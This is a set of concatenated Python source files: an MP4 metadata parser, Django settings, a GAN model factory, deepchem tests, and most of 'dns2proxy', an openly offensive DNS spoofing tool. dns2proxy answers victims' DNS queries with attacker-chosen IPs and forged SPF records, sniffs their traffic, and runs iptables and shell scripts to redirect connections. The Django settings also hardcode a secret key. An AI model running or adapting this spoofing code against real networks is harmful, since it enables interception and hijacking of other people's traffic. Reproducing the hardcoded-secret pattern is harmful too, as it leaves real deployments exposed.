b"sosn", b"tvsh", b"tven", b"tvnn"]:
__atoms[name] = (__parse_text, __render_text)
def pprint(self):
values = []
for key, value in iteritems(self):
if not isinstance(key, text_type):
key = key.decode("latin-1")
if key == "covr":
values.append("%s=%s" % (key, ", ".join(
["[%d bytes of data]" % len(data) for data in value])))
elif isinstance(value, list):
for v in value:
values.append("%s=%r" % (key, v))
else:
values.append("%s=%r" % (key, value))
return "\n".join(values)
class MP4Info(StreamInfo):
"""MPEG-4 stream information.
Attributes:
* bitrate -- bitrate in bits per second, as an int
* length -- file length in seconds, as a float
* channels -- number of audio channels
* sample_rate -- audio sampling rate in Hz
* bits_per_sample -- bits per sample
* codec (string):
* if starting with ``"mp4a"`` uses an mp4a audio codec
(see the codec parameter in rfc6381 for details e.g. ``"mp4a.40.2"``)
* for everything else see a list of possible values at
http://www.mp4ra.org/codecs.html
e.g. ``"mp4a"``, ``"alac"``, ``"mp4a.40.2"``, ``"ac-3"`` etc.
* codec_description (string):
Name of the codec used (ALAC, AAC LC, AC-3...). Values might change in
the future, use for display purposes only.
"""
bitrate = 0
channels = 0
sample_rate = 0
bits_per_sample = 0
codec = u""
codec_name = u""
def __init__(self, atoms, fileobj):
try:
moov = atoms[b"moov"]
except KeyError:
raise MP4StreamInfoError("not a MP4 file")
for trak in moov.findall(b"trak"):
hdlr = trak[b"mdia", b"hdlr"]
ok, data = hdlr.read(fileobj)
if not ok:
raise MP4StreamInfoError("Not enough data")
if data[8:12] == b"soun":
break
else:
raise MP4StreamInfoError("track has no audio data")
mdhd = trak[b"mdia", b"mdhd"]
ok, data = mdhd.read(fileobj)
if not ok:
raise MP4StreamInfoError("Not enough data")
try:
version, flags, data = parse_full_atom(data)
except ValueError as e:
raise MP4StreamInfoError(e)
if version == 0:
offset = 8
fmt = ">2I"
elif version == 1:
offset = 16
fmt = ">IQ"
else:
raise MP4StreamInfoError("Unknown mdhd version %d" % version)
end = offset + struct.calcsize(fmt)
unit, length = struct.unpack(fmt, data[offset:end])
try:
self.length = float(length) / unit
except ZeroDivisionError:
self.length = 0
try:
atom = trak[b"mdia", b"minf", b"stbl", b"stsd"]
except KeyError:
pass
else:
self._parse_stsd(atom, fileobj)
def _parse_stsd(self, atom, fileobj):
"""Sets channels, bits_per_sample, sample_rate and optionally bitrate.
Can raise MP4StreamInfoError.
"""
assert atom.name == b"stsd"
ok, data = atom.read(fileobj)
if not ok:
raise MP4StreamInfoError("Invalid stsd")
try:
version, flags, data = parse_full_atom(data)
except ValueError as e:
raise MP4StreamInfoError(e)
if version != 0:
raise MP4StreamInfoError("Unsupported stsd version")
try:
num_entries, offset = cdata.uint32_be_from(data, 0)
except cdata.error as e:
raise MP4StreamInfoError(e)
if num_entries == 0:
return
# look at the first entry if there is one
entry_fileobj = cBytesIO(data[offset:])
try:
entry_atom = Atom(entry_fileobj)
except AtomError as e:
raise MP4StreamInfoError(e)
try:
entry = AudioSampleEntry(entry_atom, entry_fileobj)
except ASEntryError as e:
raise MP4StreamInfoError(e)
else:
self.channels = entry.channels
self.bits_per_sample = entry.sample_size
self.sample_rate = entry.sample_rate
self.bitrate = entry.bitrate
self.codec = entry.codec
self.codec_description = entry.codec_description
def pprint(self):
return "MPEG-4 audio (%s), %.2f seconds, %d bps" % (
self.codec_description, self.length, self.bitrate)
class MP4(FileType):
"""An MPEG-4 audio file, probably containing AAC.
If more than one track is present in the file, the first is used.
Only audio ('soun') tracks will be read.
:ivar info: :class:`MP4Info`
:ivar tags: :class:`MP4Tags`
"""
MP4Tags = MP4Tags
_mimes = ["audio/mp4", "audio/x-m4a", "audio/mpeg4", "audio/aac"]
def load(self, filename):
self.filename = filename
with open(filename, "rb") as fileobj:
try:
atoms = Atoms(fileobj)
except AtomError as err:
reraise(error, err, sys.exc_info()[2])
try:
self.info = MP4Info(atoms, fileobj)
except error:
raise
except Exception as err:
reraise(MP4StreamInfoError, err, sys.exc_info()[2])
if not MP4Tags._can_load(atoms):
self.tags = None
else:
try:
self.tags = self.MP4Tags(atoms, fileobj)
except error:
raise
except Exception as err:
reraise(MP4MetadataError, err, sys.exc_info()[2])
def add_tags(self):
if self.tags is None:
self.tags = self.MP4Tags()
else:
raise error("an MP4 tag already exists")
@staticmethod
def score(filename, fileobj, header_data):
return (b"ftyp" in header_data) + (b"mp4" in header_data)
Open = MP4
def delete(filename):
"""Remove tags from a file."""
MP4(filename).delete()
class MediaKind:
MUSIC = [1]
AUDIO_BOOK = [2]
MUSIC_VIDEO = [6]
MOVIE = [9]
TV_SHOW = [10]
BOOKLET = [11]
RINGTONE = [14]
class HDVideo:
STANDARD = [0]
P720 = [1]
P1080 = [2]
class ContentRating:
NONE = [0]
CLEAN = [2]
EXPLICIT = [4]
|
py | 1a30383081f520f321035a843ac38a723ccdbdd5 | """
Django settings for lofiback project.
Generated by 'django-admin startproject' using Django 2.0.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Permissions for uploaded files
FILE_UPLOAD_PERMISSIONS = 0o644
CORS_ORIGIN_WHITELIST = (
'localhost:3000',
'127.0.0.1:3000',
'.lofichan.ru',
'api.lofichan.ru',
'lofichan.ru',
)
CORS_ALLOW_METHODS = (
'DELETE',
'GET',
'OPTIONS',
'PATCH',
'POST',
'PUT',
)
CORS_ALLOW_CREDENTIALS = True
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': 'error.log',
},
},
'loggers': {
'django': {
'handlers': ['file'],
'level': 'ERROR',
'propagate': True,
},
},
}
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*(qi2^67--t7g^b#4@amwxlpmawg2a@o^^6zm@pyhvui$44r!$'
#
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = os.environ.get('S_DEBUG')
ALLOWED_HOSTS = ['127.0.0.1', 'localhost', '.lofichan.ru', 'api.lofichan.ru', 'lofichan.ru', 'st.lofichan.ru']
CORS_ORIGIN_ALLOW_ALL = True
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'corsheaders',
'api',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'lofiback.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'lofiback.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': os.environ.get('DB_NAME_L'),
'USER': os.environ.get('DB_USER'),
'PASSWORD': os.environ.get('DB_PASSWORD'),
'HOST': os.environ.get('DB_HOST'),
'PORT': os.environ.get('DB_PORT')
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'ru-ru'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
PROJECT_DIR = os.path.dirname(os.path.abspath(__file__))
STATIC_ROOT = os.path.join(PROJECT_DIR, 'templates')
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "templates")
]
|
py | 1a3038d94c2a4ee31ee03541ef314aa0d483e6c9 | # python3.7
"""Collects all available models together."""
from .model_zoo import MODEL_ZOO
from .pggan_generator import PGGANGenerator
from .pggan_discriminator import PGGANDiscriminator
from .stylegan_generator import StyleGANGenerator
from .stylegan_discriminator import StyleGANDiscriminator
from .stylegan2_generator import StyleGAN2Generator
from .stylegan2_discriminator import StyleGAN2Discriminator
from .stylegan2_gs_generator import StyleGAN2_GS_Generator
# from op import FusedLeakyReLU, fused_leaky_relu, upfirdn2d
__all__ = [
'MODEL_ZOO', 'PGGANGenerator', 'PGGANDiscriminator', 'StyleGANGenerator',
'StyleGANDiscriminator', 'StyleGAN2Generator', 'StyleGAN2Discriminator',
'StyleGAN2_GS_Generator', 'build_generator', 'build_discriminator', 'build_model',
]
_GAN_TYPES_ALLOWED = ['pggan', 'stylegan', 'stylegan2', 'stylegan2_gs']
_MODULES_ALLOWED = ['generator', 'discriminator']
def build_generator(gan_type, resolution, **kwargs):
"""Builds generator by GAN type.
Args:
gan_type: GAN type to which the generator belong.
resolution: Synthesis resolution.
**kwargs: Additional arguments to build the generator.
Raises:
ValueError: If the `gan_type` is not supported.
NotImplementedError: If the `gan_type` is not implemented.
"""
if gan_type not in _GAN_TYPES_ALLOWED:
raise ValueError(f'Invalid GAN type: `{gan_type}`!\n'
f'Types allowed: {_GAN_TYPES_ALLOWED}.')
if gan_type == 'pggan':
return PGGANGenerator(resolution, **kwargs)
if gan_type == 'stylegan':
return StyleGANGenerator(resolution, **kwargs)
if gan_type == 'stylegan2':
return StyleGAN2Generator(resolution, **kwargs)
if gan_type == 'stylegan2_gs':
return StyleGAN2_GS_Generator(resolution, **kwargs)
raise NotImplementedError(f'Unsupported GAN type `{gan_type}`!')
def build_discriminator(gan_type, resolution, **kwargs):
"""Builds discriminator by GAN type.
Args:
gan_type: GAN type to which the discriminator belong.
resolution: Synthesis resolution.
**kwargs: Additional arguments to build the discriminator.
Raises:
ValueError: If the `gan_type` is not supported.
NotImplementedError: If the `gan_type` is not implemented.
"""
if gan_type not in _GAN_TYPES_ALLOWED:
raise ValueError(f'Invalid GAN type: `{gan_type}`!\n'
f'Types allowed: {_GAN_TYPES_ALLOWED}.')
if gan_type == 'pggan':
return PGGANDiscriminator(resolution, **kwargs)
if gan_type == 'stylegan':
return StyleGANDiscriminator(resolution, **kwargs)
if gan_type == 'stylegan2':
return StyleGAN2Discriminator(resolution, **kwargs)
raise NotImplementedError(f'Unsupported GAN type `{gan_type}`!')
def build_model(gan_type, module, resolution, **kwargs):
"""Builds a GAN module (generator/discriminator/etc).
Args:
gan_type: GAN type to which the model belong.
module: GAN module to build, such as generator or discriminator.
resolution: Synthesis resolution.
**kwargs: Additional arguments to build the discriminator.
Raises:
ValueError: If the `module` is not supported.
NotImplementedError: If the `module` is not implemented.
"""
if module not in _MODULES_ALLOWED:
raise ValueError(f'Invalid module: `{module}`!\n'
f'Modules allowed: {_MODULES_ALLOWED}.')
if module == 'generator':
return build_generator(gan_type, resolution, **kwargs)
if module == 'discriminator':
return build_discriminator(gan_type, resolution, **kwargs)
raise NotImplementedError(f'Unsupported module `{module}`!')
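# Usage sketch for the factory functions above (GAN type and resolution are
# illustrative assumptions):
#
#     generator = build_model('stylegan2', 'generator', resolution=256)
#     discriminator = build_model('stylegan2', 'discriminator', resolution=256)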
def parse_gan_type(module):
"""Parses GAN type of a given module.
Args:
module: The module to parse GAN type from.
Returns:
A string, indicating the GAN type.
Raises:
ValueError: If the GAN type is unknown.
"""
if isinstance(module, (PGGANGenerator, PGGANDiscriminator)):
return 'pggan'
if isinstance(module, (StyleGANGenerator, StyleGANDiscriminator)):
return 'stylegan'
if isinstance(module, (StyleGAN2Generator, StyleGAN2Discriminator)):
return 'stylegan2'
if isinstance(module, (StyleGAN2_GS_Generator, StyleGAN2Discriminator)):
return 'stylegan2_gs'
raise ValueError(f'Unable to parse GAN type from type `{type(module)}`!')
|
py | 1a3038fb7ec02caeb8de6f54fa19c0c5fe51e69c | import os
import unittest
import numpy as np
from deepchem.utils import rdkit_util
from deepchem.utils.fragment_util import get_contact_atom_indices
from deepchem.utils.fragment_util import merge_molecular_fragments
from deepchem.utils.fragment_util import get_partial_charge
from deepchem.utils.fragment_util import strip_hydrogens
from deepchem.utils.fragment_util import MolecularFragment
from deepchem.utils.fragment_util import AtomShim
class TestFragmentUtil(unittest.TestCase):
def setUp(self):
# TODO test more formats for ligand
current_dir = os.path.dirname(os.path.realpath(__file__))
self.protein_file = os.path.join(
current_dir, '../../feat/tests/data/3ws9_protein_fixer_rdkit.pdb')
self.ligand_file = os.path.join(current_dir,
'../../feat/tests/data/3ws9_ligand.sdf')
def test_get_contact_atom_indices(self):
complexes = rdkit_util.load_complex([self.protein_file, self.ligand_file])
contact_indices = get_contact_atom_indices(complexes)
assert len(contact_indices) == 2
def test_create_molecular_fragment(self):
mol_xyz, mol_rdk = rdkit_util.load_molecule(self.ligand_file)
fragment = MolecularFragment(mol_rdk.GetAtoms(), mol_xyz)
assert len(mol_rdk.GetAtoms()) == len(fragment.GetAtoms())
assert (fragment.GetCoords() == mol_xyz).all()
def test_strip_hydrogens(self):
mol_xyz, mol_rdk = rdkit_util.load_molecule(self.ligand_file)
fragment = MolecularFragment(mol_rdk.GetAtoms(), mol_xyz)
# Test on RDKit
frag = strip_hydrogens(mol_xyz, mol_rdk)
def test_merge_molecular_fragments(self):
mol_xyz, mol_rdk = rdkit_util.load_molecule(self.ligand_file)
fragment1 = MolecularFragment(mol_rdk.GetAtoms(), mol_xyz)
fragment2 = MolecularFragment(mol_rdk.GetAtoms(), mol_xyz)
joint = merge_molecular_fragments([fragment1, fragment2])
assert len(mol_rdk.GetAtoms()) * 2 == len(joint.GetAtoms())
def test_get_partial_charge(self):
from rdkit import Chem
mol = Chem.MolFromSmiles("CC")
atom = mol.GetAtoms()[0]
partial_charge = get_partial_charge(atom)
assert partial_charge == 0
def test_atom_shim(self):
atomic_num = 5
partial_charge = 1
atom_coords = np.array([0., 1., 2.])
shim = AtomShim(atomic_num, partial_charge, atom_coords)
assert shim.GetAtomicNum() == atomic_num
assert shim.GetPartialCharge() == partial_charge
assert (shim.GetCoords() == atom_coords).all()
|
py | 1a303993436f86b3ec594b86e83d431455b50013 | #!/usr/bin/python2.6
'''
dns2proxy for offensive cybersecurity v1.0
python dns2proxy.py -h for Usage.
Example:
python2.6 dns2proxy.py -i eth0 -u 192.168.1.101 -d 192.168.1.200
Example for no forwarding (only configured domain based queries and spoofed hosts):
python2.6 dns2proxy.py -i eth0 -noforward
Example for no forwarding but add IPs
python dns2proxy.py -i eth0 -I 192.168.1.101,90.1.1.1,155.54.1.1 -noforward
Author: Leonardo Nve ( [email protected])
'''
import dns.message
import dns.rrset
import dns.resolver
import socket
import numbers
import threading
from struct import *
import datetime
import pcapy
import os
import signal
import errno
from time import sleep
import argparse
consultas = {}
spoof = {}
dominios = {}
nospoof = []
nospoofto = []
victims = []
LOGREQFILE = "dnslog.txt"
LOGSNIFFFILE = "snifflog.txt"
LOGALERTFILE = "dnsalert.txt"
RESOLVCONF = "resolv.conf"
victim_file = "victims.cfg"
nospoof_file = "nospoof.cfg"
nospoofto_file = "nospoofto.cfg"
specific_file = "spoof.cfg"
dominios_file = "domains.cfg"
parser = argparse.ArgumentParser()
parser.add_argument("-N", "--noforward", help="DNS Fowarding OFF (default ON)", action="store_true")
parser.add_argument("-i", "--interface", help="Interface to use", default="eth0")
parser.add_argument("-u", "--ip1", help="First IP to add at the response", default=None)
parser.add_argument("-d", "--ip2", help="Second IP to add at the response", default=None)
parser.add_argument("-I", "--ips", help="List of IPs to add after ip1,ip2 separated with commas", default=None)
parser.add_argument("-S", "--silent", help="Silent mode", action="store_true")
parser.add_argument("-A", "--adminIP", help="Administrator IP for no filtering", default="192.168.0.1")
args = parser.parse_args()
debug = not args.silent
dev = args.interface
adminip = args.adminIP
ip1 = args.ip1
ip2 = args.ip2
Forward = not args.noforward
fake_ips = []
# List of IPs
if args.ips is not None:
for ip in args.ips.split(","):
fake_ips.append(ip)
Resolver = dns.resolver.Resolver()
######################
# GENERAL SECTION #
######################
def save_req(lfile, str):
f = open(lfile, "a")
f.write(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") + ' ' + str)
f.close()
def SIGUSR1_handle(signalnum, frame):
global noserv
global Resolver
noserv = 0
DEBUGLOG('Reconfiguring....')
process_files()
Resolver.reset()
Resolver.read_resolv_conf(RESOLVCONF)
return
def process_files():
global nospoof
global spoof
global nospoof_file
global specific_file
global dominios_file
global dominios
global nospoofto_file
for i in nospoof[:]:
nospoof.remove(i)
for i in nospoofto[:]:
nospoofto.remove(i)
for i in victims[:]:
victims.remove(i)
dominios.clear()
spoof.clear()
nsfile = open(nospoof_file, 'r')
for line in nsfile:
if line[0] == '#':
continue
h = line.split()
if len(h) > 0:
DEBUGLOG('Non spoofing ' + h[0])
nospoof.append(h[0])
nsfile.close()
nsfile = open(victim_file, 'r')
for line in nsfile:
if line[0] == '#':
continue
h = line.split()
if len(h) > 0:
DEBUGLOG('Spoofing only to ' + h[0])
victims.append(h[0])
nsfile.close()
nsfile = open(nospoofto_file, 'r')
for line in nsfile:
if line[0] == '#':
continue
h = line.split()
if len(h) > 0:
DEBUGLOG('Non spoofing to ' + h[0])
nospoofto.append(h[0])
nsfile.close()
nsfile = open(specific_file, 'r')
for line in nsfile:
if line[0] == '#':
continue
h = line.split()
if len(h) > 1:
DEBUGLOG('Specific host spoofing ' + h[0] + ' with ' + h[1])
spoof[h[0]] = h[1]
nsfile.close()
nsfile = open(dominios_file, 'r')
for line in nsfile:
if line[0] == '#':
continue
h = line.split()
if len(h) > 1:
DEBUGLOG('Specific domain IP ' + h[0] + ' with ' + h[1])
dominios[h[0]] = h[1]
nsfile.close()
return
def DEBUGLOG(str):
global debug
if debug:
print str
return
def handler_msg(id):
os.popen('./handler_msg.sh %s >> handler_msg.log 2>> handler_msg_error.log &'%id.replace('`','_').replace(';','_').replace('|','_').replace('&','_'))
return
######################
# SNIFFER SECTION #
######################
class ThreadSniffer(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
#DEBUGLOG( self.getName(), " Sniffer Waiting connections....")
go()
def go():
global ip1
global dev
bpffilter = "dst host %s and not src host %s and !(tcp dst port 80 or tcp dst port 443) and (not host %s)" % (
ip1, ip1, adminip)
cap = pcapy.open_live(dev, 255, 1, 0)
cap.setfilter(bpffilter)
DEBUGLOG( "Starting sniffing in (%s = %s)...." % (dev, ip1))
#start sniffing packets
while True:
try:
(header, packet) = cap.next()
parse_packet(packet)
except:
pass
#DEBUGLOG( ('%s: captured %d bytes, truncated to %d bytes' %(datetime.datetime.now(), header.getlen(), header.getcaplen())))
#function to parse a packet
def parse_packet(packet):
eth_length = 14
eth_protocol = 8
global ip1
global consultas
global ip2
#Parse IP packets, IP Protocol number = 8
if eth_protocol == 8:
#Parse IP header
#take first 20 characters for the ip header
ip_header = packet[eth_length:20 + eth_length]
#now unpack them :)
iph = unpack('!BBHHHBBH4s4s', ip_header)
version_ihl = iph[0]
#version = version_ihl >> 4
ihl = version_ihl & 0xF
iph_length = ihl * 4
#ttl = iph[5]
protocol = iph[6]
s_addr = socket.inet_ntoa(iph[8])
d_addr = socket.inet_ntoa(iph[9])
#TCP protocol
if protocol == 6:
t = iph_length + eth_length
tcp_header = packet[t:t + 20]
#now unpack them :)
tcph = unpack('!HHLLBBHHH', tcp_header)
source_port = tcph[0]
dest_port = tcph[1]
# sequence = tcph[2]
# acknowledgement = tcph[3]
# doff_reserved = tcph[4]
# tcph_length = doff_reserved >> 4
if consultas.has_key(str(s_addr)):
DEBUGLOG(' ==> Source Address : ' + str(s_addr) + ' * Destination Address : ' + str(d_addr))
DEBUGLOG(' Source Port : ' + str(source_port) + ' * Dest Port : ' + str(dest_port))
# print '>>>> '+str(s_addr)+' is in the list!!!!.....'
comando = 'sh ./IPBouncer.sh %s %s %s %s' % (
ip2, str(dest_port), consultas[str(s_addr)], str(dest_port))
os.system(comando.replace(';','_').replace('|','_').replace('&','_').replace('`','_'))
#print '>>>> ' + comando
comando = '/sbin/iptables -D INPUT -p tcp -d %s --dport %s -s %s --sport %s --j REJECT --reject-with tcp-reset' % (
ip1, str(dest_port), str(s_addr), str(source_port))
os.system(comando.replace(';','_').replace('|','_').replace('&','_').replace('`','_'))
comando = '/sbin/iptables -A INPUT -p tcp -d %s --dport %s -s %s --sport %s --j REJECT --reject-with tcp-reset' % (
ip1, str(dest_port), str(s_addr), str(source_port))
os.system(comando.replace(';','_').replace('|','_').replace('&','_').replace('`','_'))
#print '>>>> ' + comando
#UDP packets
elif protocol == 17:
u = iph_length + eth_length
#udph_length = 8
#udp_header = packet[u:u + 8]
#now unpack them :)
#udph = unpack('!HHHH', udp_header)
#source_port = udph[0]
#dest_port = udph[1]
#length = udph[2]
#checksum = udph[3]
#DEBUGLOG('Source Port : ' + str(source_port) + ' Dest Port : ' + str(dest_port) + ' Length : ' + str(length) + ' Checksum : ' + str(checksum))
#h_size = eth_length + iph_length + udph_length
#data_size = len(packet) - h_size
#get data from the packet
#data = packet[h_size:]
######################
# DNS SECTION #
######################
def respuestas(name, type):
global Resolver
DEBUGLOG('Query = ' + name + ' ' + type)
try:
answers = Resolver.query(name, type)
except Exception, e:
DEBUGLOG('Exception...')
return 0
return answers
def requestHandler(address, message):
resp = None
dosleep = False
try:
message_id = ord(message[0]) * 256 + ord(message[1])
DEBUGLOG('msg id = ' + str(message_id))
if message_id in serving_ids:
DEBUGLOG('I am already serving this request.')
return
serving_ids.append(message_id)
DEBUGLOG('Client IP: ' + address[0])
prov_ip = address[0]
try:
msg = dns.message.from_wire(message)
try:
op = msg.opcode()
if op == 0:
# standard and inverse query
qs = msg.question
if len(qs) > 0:
q = qs[0]
DEBUGLOG('request is ' + str(q))
save_req(LOGREQFILE, 'Client IP: ' + address[0] + ' request is ' + str(q) + '\n')
if q.rdtype == dns.rdatatype.A:
DEBUGLOG('Doing the A query....')
resp, dosleep = std_A_qry(msg, prov_ip)
elif q.rdtype == dns.rdatatype.PTR:
#DEBUGLOG('Doing the PTR query....')
resp = std_PTR_qry(msg)
elif q.rdtype == dns.rdatatype.MX:
DEBUGLOG('Doing the MX query....')
resp = std_MX_qry(msg)
elif q.rdtype == dns.rdatatype.TXT:
#DEBUGLOG('Doing the TXT query....')
resp = std_TXT_qry(msg)
elif q.rdtype == dns.rdatatype.AAAA:
#DEBUGLOG('Doing the AAAA query....')
resp = std_AAAA_qry(msg)
else:
# not implemented
resp = make_response(qry=msg, RCODE=4) # RCODE = 4 Not Implemented
else:
# not implemented
resp = make_response(qry=msg, RCODE=4) # RCODE = 4 Not Implemented
except Exception, e:
DEBUGLOG('got ' + repr(e))
resp = make_response(qry=msg, RCODE=2) # RCODE = 2 Server Error
DEBUGLOG('resp = ' + repr(resp.to_wire()))
except Exception, e:
DEBUGLOG('got ' + repr(e))
resp = make_response(id=message_id, RCODE=1) # RCODE = 1 Format Error
DEBUGLOG('resp = ' + repr(resp.to_wire()))
except Exception, e:
# message was crap, not even the ID
DEBUGLOG('got ' + repr(e))
if resp:
s.sendto(resp.to_wire(), address)
if dosleep: sleep(1) # Performance downgrade no tested jet
def std_PTR_qry(msg):
qs = msg.question
DEBUGLOG( str(len(qs)) + ' questions.')
iparpa = qs[0].to_text().split(' ', 1)[0]
DEBUGLOG('Host: ' + iparpa)
resp = make_response(qry=msg)
hosts = respuestas(iparpa[:-1], 'PTR')
if isinstance(hosts, numbers.Integral):
DEBUGLOG('No host....')
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
return resp
for host in hosts:
DEBUGLOG('Adding ' + host.to_text())
rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.PTR, host.to_text())
resp.answer.append(rrset)
return resp
def std_MX_qry(msg):
qs = msg.question
DEBUGLOG(str(len(qs)) + ' questions.')
iparpa = qs[0].to_text().split(' ', 1)[0]
DEBUGLOG('Host: ' + iparpa)
# MX responses are temporarily disabled: always answer NXDOMAIN and skip the lookup code below
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
return resp
resp = make_response(qry=msg)
hosts = respuestas(iparpa[:-1], 'MX')
if isinstance(hosts, numbers.Integral):
DEBUGLOG('No host....')
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
return resp
for host in hosts:
DEBUGLOG('Adding ' + host.to_text())
rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.MX, host.to_text())
resp.answer.append(rrset)
return resp
def std_TXT_qry(msg):
qs = msg.question
print str(len(qs)) + ' questions.'
iparpa = qs[0].to_text().split(' ', 1)[0]
print 'Host: ' + iparpa
resp = make_response(qry=msg)
host = iparpa[:-1]
punto = host.find(".")
dominio = host[punto:]
host = "."+host
spfresponse = ''
if (dominio in dominios) or (host in dominios):
ttl = 1
DEBUGLOG('Alert domain! (TXT) ID: ' + host)
# Here the HANDLE!
#os.popen("python /yowsup/yowsup-cli -c /yowsup/config -s <number> \"Host %s\nIP %s\" > /dev/null &"%(id,prov_ip));
save_req(LOGALERTFILE, 'Alert domain! (TXT) ID: ' + host+ '\n')
if host in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%host
if dominio in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%dominio
DEBUGLOG('Responding with SPF = ' + spfresponse)
rrset = dns.rrset.from_text(iparpa, ttl, dns.rdataclass.IN, dns.rdatatype.TXT, spfresponse)
resp.answer.append(rrset)
return resp
hosts = respuestas(iparpa[:-1], 'TXT')
if isinstance(hosts, numbers.Integral):
print 'No host....'
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
return resp
for host in hosts:
print 'Adding ' + host.to_text()
rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.TXT, host.to_text())
resp.answer.append(rrset)
return resp
def std_SPF_qry(msg):
qs = msg.question
print str(len(qs)) + ' questions.'
iparpa = qs[0].to_text().split(' ', 1)[0]
print 'Host: ' + iparpa
resp = make_response(qry=msg)
# host = iparpa[:-1]
# punto = host.find(".")
# dominio = host[punto:]
# host = "."+host
# if (dominio in dominios) or (host in dominios):
# ttl = 1
# DEBUGLOG('Alert domain! (TXT) ID: ' + host)
# # Here the HANDLE!
# #os.popen("python /yowsup/yowsup-cli -c /yowsup/config -s <number> \"Host %s\nIP %s\" > /dev/null &"%(id,prov_ip));
# save_req(LOGALERTFILE, 'Alert domain! (TXT) ID: ' + host+ '\n')
# if host in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%host
# if dominio in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%dominio
# DEBUGLOG('Responding with SPF = ' + spfresponse)
# rrset = dns.rrset.from_text(iparpa, ttl, dns.rdataclass.IN, dns.rdatatype.TXT, spfresponse)
# resp.answer.append(rrset)
# return resp
hosts = respuestas(iparpa[:-1], 'SPF')
if isinstance(hosts, numbers.Integral):
print 'No host....'
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
return resp
for host in hosts:
print 'Adding ' + host.to_text()
rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.SPF, host.to_text())
resp.answer.append(rrset)
return resp
def std_AAAA_qry(msg):
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
return resp
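# Core spoofing logic for A queries: alert/spoofed domains get fake records, some
# hostnames are rewritten SSLStrip-style before resolving, and depending on the
# Forward/victims/nospoof settings the answer carries ip1/ip2/fake_ips and/or the
# real upstream addresses.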
def std_A_qry(msg, prov_ip):
global consultas
global ip1
global ip2
global fake_ips
dosleep = False
qs = msg.question
DEBUGLOG(str(len(qs)) + ' questions.')
resp = make_response(qry=msg)
for q in qs:
qname = q.name.to_text()[:-1]
DEBUGLOG('q name = ' + qname)
host = qname.lower()
# dom1 = None
# dominio = None
# punto1 = host.rfind(".")
# punto2 = host.rfind(".",0,punto1-1)
# if punto1 > -1:
# dom1 = host[punto1:]
# if punto2 > -1:
# dominio = host[punto2:]
find_host = None
for d in dominios:
if d in host:
find_host = d
if (find_host is not None):
ttl = 1
# id = host[:punto2]
# if dom1 in dominios:
# id = host[:punto1]
# dominio = dom1
DEBUGLOG('Alert domain! ID: ' + host)
# Here the HANDLE!
#os.popen("python /yowsup/yowsup-cli -c /yowsup/config -s <number> \"Host %s\nIP %s\" > /dev/null &"%(id,prov_ip));
handler_msg(host)
save_req(LOGALERTFILE, 'Alert domain! ID: ' + host + '\n')
if host not in spoof:
DEBUGLOG('Responding with IP = ' + dominios[find_host])
rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, dominios[find_host])
else:
DEBUGLOG('Responding with IP = ' + spoof[host])
rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, spoof[host])
resp.answer.append(rrset)
return resp, dosleep
